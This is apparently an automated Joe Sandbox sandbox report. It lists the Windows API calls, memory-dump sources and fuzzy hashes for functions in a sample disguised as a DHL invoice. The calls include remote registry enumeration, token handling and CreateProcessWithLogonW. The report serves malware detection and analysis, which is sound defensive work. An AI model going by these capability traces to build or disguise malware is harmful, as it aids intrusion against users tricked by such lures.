GetWindowRect.USER32(?,?), ref: 01245D71
ScreenToClient.USER32(?,?), ref: 01245D99
GetClientRect.USER32 ref: 01245ED7
GetWindowRect.USER32(?,?), ref: 01245EF8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: e4a7a5a54cce37882145af57029b920f5772e3c3009af1128ed9521f8993c77d
Instruction ID: d0e158f24f3674e49ec876d0f62e1e014499554357c22ed151470244738fe664
Opcode Fuzzy Hash: e4a7a5a54cce37882145af57029b920f5772e3c3009af1128ed9521f8993c77d
Instruction Fuzzy Hash: 70B16A34A2078ADBDB24DFA9C4417EABBF1FF48310F04841AE9A9D7290DB34A951CB54

Function 012701B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 012700BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012700D6
__allrem.LIBCMT ref: 012700ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0127010B
__allrem.LIBCMT ref: 01270122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01270140

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: cb6c59bc5aabd1402f7a41b36df57afbf46293e5a99ebccb8f7411e3fa58abf9
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: F1811872A207079FEB21AF6DDC51B7B73E8AF52324F24412AF611D62C0E7B0D9448B94

Function 012CBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Part of subcall function 012CC998: CharUpperBuffW.USER32(?,?), ref: 012CC9B5
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CC9F1
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CCA68
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 012CBCCA
RegOpenKeyExW.ADVAPI32 ref: 012CBD25
RegCloseKey.ADVAPI32(00000000), ref: 012CBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 012CBD99
RegCloseKey.ADVAPI32(?), ref: 012CBDF3
RegCloseKey.ADVAPI32(?), ref: 012CBDFF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 31b387d637d610487c3da8f4baa8fece95bf5ce3160dc130c34313bb2a780c4c
Instruction ID: 98cc8a77a93262040469d6a5f60710b9c6797c184500e2387ecfe5c4248df045
Opcode Fuzzy Hash: 31b387d637d610487c3da8f4baa8fece95bf5ce3160dc130c34313bb2a780c4c
Instruction Fuzzy Hash: 98819270128242EFD714DF24C485E2ABBE5FF84748F14855CF65A4B291DB31ED45CB92

Function 0129F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0129F7B9
SysAllocString.OLEAUT32(00000001), ref: 0129F860
VariantCopy.OLEAUT32(0129FA64,00000000), ref: 0129F889
VariantClear.OLEAUT32(0129FA64), ref: 0129F8AD
VariantCopy.OLEAUT32(0129FA64,00000000), ref: 0129F8B1
VariantClear.OLEAUT32(?), ref: 0129F8BB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 69cff979e54f8f8189cae7461378944e0208be410e2c4e9af76b52c8c763478d
Instruction ID: 536515ec76d296a645b362a82a138db37da59fc9ea14cb500ebd8e4f930735dd
Opcode Fuzzy Hash: 69cff979e54f8f8189cae7461378944e0208be410e2c4e9af76b52c8c763478d
Instruction Fuzzy Hash: 73510531630312BBDFA4AF6DD685B79BBA8EF55310F14844AE905DF285DBB0C840CB96

Function 012B910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 01247620: _wcslen.LIBCMT ref: 01247625

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 012B94E5
_wcslen.LIBCMT ref: 012B9506
_wcslen.LIBCMT ref: 012B952D
GetSaveFileNameW.COMDLG32(00000058), ref: 012B9585

Strings

X, xrefs: 012B9412

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: d6fcfb0f1eb7ec7706d88e86f430f0e12c05965cb019e1b5e638cf71932da98c
Instruction ID: dd30d5253226de69caf4af014172ab7b44c532ed712e4b5f3bec62e36c65579f
Opcode Fuzzy Hash: d6fcfb0f1eb7ec7706d88e86f430f0e12c05965cb019e1b5e638cf71932da98c
Instruction Fuzzy Hash: 94E1C371524342CFDB28DF24C480AAEB7E4FF94354F04896DEA899B2A1DB31DD84CB91

Function 0125920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 01259BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 01259BB2

BeginPaint.USER32(?,?), ref: 01259241
GetWindowRect.USER32(?,?), ref: 012592A5
ScreenToClient.USER32(?,?), ref: 012592C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 012592D3
EndPaint.USER32(?,?), ref: 01259321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 012971EA

Part of subcall function 01259339: BeginPath.GDI32(00000000), ref: 01259357

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: c3f23ecd26745d6f648a73b258be21c7a1fd8d11dcf80b2e4e2b1ce784bc6240
Instruction ID: 4eaaf59e3f7b9dda7bf0ff56fe642af51c4bb2c096f550d1d4a9891a566a7e3f
Opcode Fuzzy Hash: c3f23ecd26745d6f648a73b258be21c7a1fd8d11dcf80b2e4e2b1ce784bc6240
Instruction Fuzzy Hash: 5D41B271525301EFDB21DF28D8C4FBA7BA9EB45324F040229FAA4C71A1C7709885DB61

Function 012B07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 012B080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 012B0847
EnterCriticalSection.KERNEL32(?), ref: 012B0863
LeaveCriticalSection.KERNEL32(?), ref: 012B08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 012B08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 012B0921

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 2a1b8b3fb0d324411b0164e49b36a7595b81786f6f0e2da99f72af2b213b6511
Instruction ID: 81ab767e6e854c0e12965c40e560e325e468c17630a35b44f2e595433cf1eec3
Opcode Fuzzy Hash: 2a1b8b3fb0d324411b0164e49b36a7595b81786f6f0e2da99f72af2b213b6511
Instruction Fuzzy Hash: D5416B71910206EFDF15AF54DCC4AAA77B9FF04710F1440A9ED04AE28AD730DE65DBA4

Function 012D81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000), ref: 012D824C
EnableWindow.USER32(00000000,00000000), ref: 012D8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 012D82D1
ShowWindow.USER32(00000000,00000004), ref: 012D82E5
EnableWindow.USER32(00000000,00000001), ref: 012D830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 012D832F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 12ebcf47bd34c27fb53966894931ad75748a146ff6981fc4995138a01f48e183
Instruction ID: c2a78a7339aa72b27cda27120080e16ffd0a956ce6855bec485566391486446c
Opcode Fuzzy Hash: 12ebcf47bd34c27fb53966894931ad75748a146ff6981fc4995138a01f48e183
Instruction Fuzzy Hash: E541E634611681AFEB26CF29D88DBE47FF1FB4A714F1842A8E7184F266C731A441CB80

Function 012C22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 012C22E8

Part of subcall function 012BE4EC: GetWindowRect.USER32(?,?), ref: 012BE504

GetDesktopWindow.USER32 ref: 012C2312
GetWindowRect.USER32(00000000), ref: 012C2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 012C2355
GetCursorPos.USER32(?), ref: 012C2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 012C23DF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: a99981fba904a134c35303d9399671ced2ec82f697a535fcfe37812a6dc1c853
Instruction ID: 1ad194eaafa4d89cf1a9180b0bced158a01477396673d4cb31a65126f8c3abe6
Opcode Fuzzy Hash: a99981fba904a134c35303d9399671ced2ec82f697a535fcfe37812a6dc1c853
Instruction Fuzzy Hash: 5731E272515306AFD720DF18D848BABBBA9FF84710F000A1DFA85A7181DB30E919CB92

Function 012A4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 012A4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 012A4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 012A4CEA
_wcslen.LIBCMT ref: 012A4D08
CharUpperBuffW.USER32(00000000,00000000), ref: 012A4D10
_wcsstr.LIBVCRUNTIME ref: 012A4D1A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 04fe7e9c1d57c27bc9728511220823f0d6e096a609fdbd5edb16e71d20675d25
Instruction ID: 31237a88502e919c6e2b6d59a688b37a794f4d35d04d331b366137661898c621
Opcode Fuzzy Hash: 04fe7e9c1d57c27bc9728511220823f0d6e096a609fdbd5edb16e71d20675d25
Instruction Fuzzy Hash: 2721F931624241BBEB296B39EC49E7B7BADDF45750F54402DF909CA181DAA1D840D7E0

Function 012B581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 01243AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,01243A97,?,?,01242E7F,?,?,?,00000000), ref: 01243AC2

_wcslen.LIBCMT ref: 012B587B
CoInitialize.OLE32(00000000), ref: 012B5995
CoCreateInstance.OLE32(012DFCF8,00000000,00000001,012DFB68,?), ref: 012B59AE
CoUninitialize.OLE32 ref: 012B59CC

Strings

.lnk, xrefs: 012B5876, 012B58C1, 012B5985

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: f0f582ec440e0b9cf4c698a089001b4c4850f35bd1c4df87eeba6755e079d66f
Instruction ID: 99cf120d35d9c7c3aba07f2b04344793bc53ec8c688cff3e7bc6d888e2d165a4
Opcode Fuzzy Hash: f0f582ec440e0b9cf4c698a089001b4c4850f35bd1c4df87eeba6755e079d66f
Instruction Fuzzy Hash: 8CD15371A243029FC714DF28C480A6ABBE5FF89754F14885DF98A9B361DB31EC45CB92

Function 012A175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 012A0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 012A0FCA
Part of subcall function 012A0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 012A0FD6
Part of subcall function 012A0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 012A0FE5
Part of subcall function 012A0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 012A0FEC
Part of subcall function 012A0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 012A1002

GetLengthSid.ADVAPI32(?,00000000,012A1335), ref: 012A17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 012A17BA
HeapAlloc.KERNEL32(00000000), ref: 012A17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 012A17DA
GetProcessHeap.KERNEL32(00000000,00000000,012A1335), ref: 012A17EE
HeapFree.KERNEL32(00000000), ref: 012A17F5

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 1c9c9414a316f9102b1735b1763f1801ed881e9780479f1e87d62c4f914804d1
Instruction ID: a06fdaeb86d483f62b2eb0100f9419a6f91b84aa0b0d9a6d7edd68366e698b08
Opcode Fuzzy Hash: 1c9c9414a316f9102b1735b1763f1801ed881e9780479f1e87d62c4f914804d1
Instruction Fuzzy Hash: C811B131921216FFEB248FA8DC49FAE7FA9EB46365F544018F64197184C7359960CB60

Function 012A14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 012A14FF
OpenProcessToken.ADVAPI32(00000000), ref: 012A1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 012A1515
CloseHandle.KERNEL32(00000004), ref: 012A1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 012A154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 012A1563

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7e6cec8f1f7c881faecce1cba02a6ef1249aac63f70d77d0dc6aa7c8734d7bbb
Instruction ID: 54fa49c4245bfbec289314d586fda6c3f9d4317cabad2ed9f2a275ef2fb991f4
Opcode Fuzzy Hash: 7e6cec8f1f7c881faecce1cba02a6ef1249aac63f70d77d0dc6aa7c8734d7bbb
Instruction Fuzzy Hash: 1F113A7250124EABEF219F98ED49FDE7BA9EF09754F084119FA05A2090C375CE60DB60

Function 01263382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01263379,01262FE5), ref: 01263390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0126339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 012633B7
SetLastError.KERNEL32(00000000,?,01263379,01262FE5), ref: 01263409

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9dc1d2db146b809e034325c2496b788ac7997aebe4e85a0bd5fb477fd300e0c6
Instruction ID: 3a1e235700471b1981b135ed94330ae7652c24161564b94f57fc67762b02d4d1
Opcode Fuzzy Hash: 9dc1d2db146b809e034325c2496b788ac7997aebe4e85a0bd5fb477fd300e0c6
Instruction Fuzzy Hash: 2101FC336393136EE636A7787C945772ADCFB16275720032EE618812E4EF618CA18684

Function 01272D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01275686,01283CD6,?,00000000,?,01275B6A,?,?,?,?,?,0126E6D1,?,01308A48), ref: 01272D78
_free.LIBCMT ref: 01272DAB
_free.LIBCMT ref: 01272DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0126E6D1,?,01308A48,00000010,01244F4A,?,?,00000000,01283CD6), ref: 01272DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0126E6D1,?,01308A48,00000010,01244F4A,?,?,00000000,01283CD6), ref: 01272DEC
_abort.LIBCMT ref: 01272DF2

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 69aa269121eaa5c6da05d05f1ce5246a00afb295c4afeb745728cc67081ca1d1
Instruction ID: 8601c3573715a2bd1e04c61216f68974425d017d50c80f9a2dfcf64f0a42d41a
Opcode Fuzzy Hash: 69aa269121eaa5c6da05d05f1ce5246a00afb295c4afeb745728cc67081ca1d1
Instruction Fuzzy Hash: AFF0C831925603F7C627773DBC09E7F2569AFD26A1F24051DF924921C8EE7488418260

Function 012D8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 01259639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 01259693
Part of subcall function 01259639: SelectObject.GDI32(?,00000000), ref: 012596A2
Part of subcall function 01259639: BeginPath.GDI32(?), ref: 012596B9
Part of subcall function 01259639: SelectObject.GDI32(?,00000000), ref: 012596E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 012D8A4E
LineTo.GDI32(?,00000003,00000000), ref: 012D8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 012D8A70
LineTo.GDI32(?,00000000,00000003), ref: 012D8A80
EndPath.GDI32(?), ref: 012D8A90
StrokePath.GDI32(?), ref: 012D8AA0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
